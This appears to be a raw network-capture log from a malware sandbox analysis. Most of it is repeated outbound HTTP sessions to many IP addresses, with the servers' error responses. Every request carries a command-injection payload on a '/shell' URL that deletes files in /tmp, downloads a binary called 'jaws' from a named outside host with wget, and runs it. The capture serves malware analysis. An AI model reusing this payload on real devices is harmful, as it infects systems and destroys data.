                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:17.957777977 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.797363043 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:29.476145983 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.833983898 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          496192.168.2.2352802104.100.195.10580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.214191914 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:15.377064943 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 63 36 39 37 63 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 35 26 23 34 36 3b 33 30 31 37 35 65 34 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;4c697c68&#46;1704173115&#46;30175e44</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          497192.168.2.23453842.17.176.1180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.290468931 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:15.529839993 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 35 35 65 36 63 63 31 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 35 26 23 34 36 3b 35 35 36 66 36 37 35 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;a55e6cc1&#46;1704173115&#46;556f6750</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          498192.168.2.235407034.126.113.7680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.540978909 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:15.867830038 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          499192.168.2.234071266.78.59.10280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.619278908 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          500192.168.2.2354290107.22.7.9080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.619385004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:15.776501894 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          501192.168.2.233762852.216.42.2180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.620032072 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:15.778028011 CET636INHTTP/1.1 505 HTTP Version not supported
                                                          Date: Tue, 02 Jan 24 05:25:15 GMT
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          x-amz-id-2: yo8d+Q1tc31JzO+ygk/OVLhbQh+IvUUvdeDQuAgLiGGICbxfFfJTnEbSnpG8RjhsusQeMuFOKsqRRdDEva22pLZrKv2+3OGo
                                                          x-amz-request-id: 2AD5D28EE4DE2111
                                                          Content-Type: application/xml
                                                          Server: AmazonS3
                                                          Data Raw: 31 33 30 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 48 74 74 70 56 65 72 73 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 48 54 54 50 20 76 65 72 73 69 6f 6e 20 73 70 65 63 69 66 69 65 64 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 32 41 44 35 44 32 38 45 45 34 44 45 32 31 31 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 79 6f 38 64 2b 51 31 74 63 33 31 4a 7a 4f 2b 79 67 6b 2f 4f 56 4c 68 62 51 68 2b 49 76 55 55 76 64 65 44 51 75 41 67 4c 69 47 47 49 43 62 78 66 46 66 4a 54 6e 45 62 53 6e 70 47 38 52 6a 68 73 75 73 51 65 4d 75 46 4f 4b 73 71 52 52 64 44 45 76 61 32 32 70 4c 5a 72 4b 76 32 2b 33 4f 47 6f 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72 72 6f 72 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 130<?xml version="1.0" encoding="UTF-8"?><Error><Code>HttpVersionNotSupported</Code><Message>The HTTP version specified is not supported.</Message><RequestId>2AD5D28EE4DE2111</RequestId><HostId>yo8d+Q1tc31JzO+ygk/OVLhbQh+IvUUvdeDQuAgLiGGICbxfFfJTnEbSnpG8RjhsusQeMuFOKsqRRdDEva22pLZrKv2+3OGo</HostId></Error>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          502192.168.2.234606274.39.214.2380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.627181053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:15.792593002 CET408INHTTP/1.1 500 Internal Error
                                                          content-length: 268
                                                          content-type:text/html
                                                          connection:close
                                                          cache-control:no-cache, no-store
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 35 30 30 20 69 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 3c 2f 68 31 3e 41 6e 20 75 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 3b 20 70 6c 65 61 73 65 20 77 61 69 74 20 61 20 77 68 69 6c 65 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 20 49 66 20 74 68 65 20 70 72 6f 62 6c 65 6d 20 70 65 72 73 69 73 74 73 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 75 70 70 6f 72 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 2e 3c 68 31 3e 20 41 64 64 69 74 69 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 3c 2f 68 31 3e 54 68 65 20 48 54 54 50 20 68 65 61 64 65 72 73 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 70 61 72 73 65 64 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <html><body><h1>HTTP 500 internal server error</h1>An unexpected error occurred; please wait a while and try again. If the problem persists, please contact your support representative.<h1> Additional information </h1>The HTTP headers could not be parsed.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          503192.168.2.2352566213.235.69.15380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.717215061 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:15.974154949 CET516INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html
                                                          Content-Length: 349
                                                          Connection: close
                                                          Date: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Server: lighttpd/1.4.39
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          504192.168.2.2359920220.137.212.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.748234034 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          505192.168.2.2360320104.76.96.2180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.761034012 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:16.059909105 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 33 35 34 33 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 35 26 23 34 36 3b 33 35 61 34 37 62 65 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;3e354317&#46;1704173115&#46;35a47bed</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          506192.168.2.234368218.208.8.11580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.875600100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:16.034378052 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:15 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          507192.168.2.235124067.160.112.10880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.888423920 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:16.072081089 CET500INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html
                                                          Content-Length: 345
                                                          Connection: close
                                                          Date: Tue, 02 Jan 2024 05:25:13 GMT
                                                          Server: lighttpd/1.4.54
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          508192.168.2.2354168186.88.83.19480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.957335949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          509192.168.2.23522762.21.224.12680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:16.010358095 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:16.245188951 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:16 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:16 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 66 35 37 63 38 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 36 26 23 34 36 3b 34 65 66 39 31 65 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;3f57c817&#46;1704173116&#46;4ef91ee</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          510192.168.2.2339722184.85.178.23680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:16.029669046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:16.266865015 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:16 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:16 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 65 33 63 31 32 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 36 26 23 34 36 3b 33 32 64 37 65 66 62 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
